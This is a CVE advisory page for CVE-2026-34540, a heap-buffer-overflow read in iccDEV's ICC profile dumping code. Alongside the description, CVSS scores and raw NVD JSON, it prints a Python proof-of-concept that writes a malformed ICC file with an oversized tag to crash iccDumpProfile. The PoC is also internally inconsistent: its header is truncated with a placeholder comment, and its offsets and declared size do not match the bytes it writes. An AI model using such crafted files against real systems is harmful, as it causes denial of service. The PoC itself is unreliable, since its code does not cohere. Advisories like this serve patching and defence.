Security Vulnerability Report
中文
CVE-2026-34540 CVSS 6.2 MEDIUM

CVE-2026-34540

Published: 2026-03-31 22:16:22
Last Modified: 2026-04-20 13:53:34
Source: [email protected]

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a heap-buffer-overflow (HBO) in icMemDump() when iccDumpProfile attempts to dump/describe malformed tag contents. The issue is observable under AddressSanitizer as an out-of-bounds heap read in icMemDump(...) at IccProfLib/IccUtil.cpp:1002, reachable via CIccTagUnknown::Describe(). This issue has been patched in version 2.3.1.6.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # CVE-2026-34540 PoC Generator # This script generates a crafted ICC profile that may trigger the heap buffer overflow in iccDEV. # ICC Profile Header (simplified) header = b"\x00\x00\x00\x00" # Profile size (placeholder) header += b"acsp" # CMM type signature header += b"\x00\x00\x00\x00" # Profile version # ... (rest of standard header fields) # Create a malformed tag. The vulnerability occurs in icMemDump when dumping malformed tags. # We will craft a tag entry pointing to invalid data or with a size that causes overflow. tag_count = 1 tag_table = b"" tag_signature = b"desc" offset_to_data = 128 + 4 + (tag_count * 12) # Offset after header and tag count and table tag_size = 0xFFFFFFFF # Excessive size to trigger overflow in icMemDump tag_table += tag_signature tag_table += struct.pack(">I", offset_to_data) tag_table += struct.pack(">I", tag_size) # Assemble the profile profile_size = len(header) + 4 + len(tag_table) + tag_size header = struct.pack(">I", profile_size) + header[4:] # Update size payload = header + struct.pack(">I", tag_count) + tag_table payload += b"A" * 100 # Minimal data padding filename = "cve_2026_34540_poc.icc" with open(filename, "wb") as f: f.write(payload) print(f"POC file generated: {filename}") print("Usage: Load this file with a vulnerable version of iccDEV using iccDumpProfile.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34540", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:21.600", "lastModified": "2026-04-20T13:53:34.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a heap-buffer-overflow (HBO) in icMemDump() when iccDumpProfile attempts to dump/describe malformed tag contents. The issue is observable under AddressSanitizer as an out-of-bounds heap read in icMemDump(...) at IccProfLib/IccUtil.cpp:1002, reachable via CIccTagUnknown::Describe(). This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar un desbordamiento de búfer de pila (HBO) en icMemDump() cuando iccDumpProfile intenta volcar/describir contenidos de etiquetas malformados. El problema es observable bajo AddressSanitizer como una lectura de pila fuera de límites en icMemDump(...) en IccProfLib/IccUtil.cpp:1002, alcanzable a través de CIccTagUnknown::Describe(). Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/674", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/689", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-gjx3-6cp6-q2x5", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/674", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/689", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.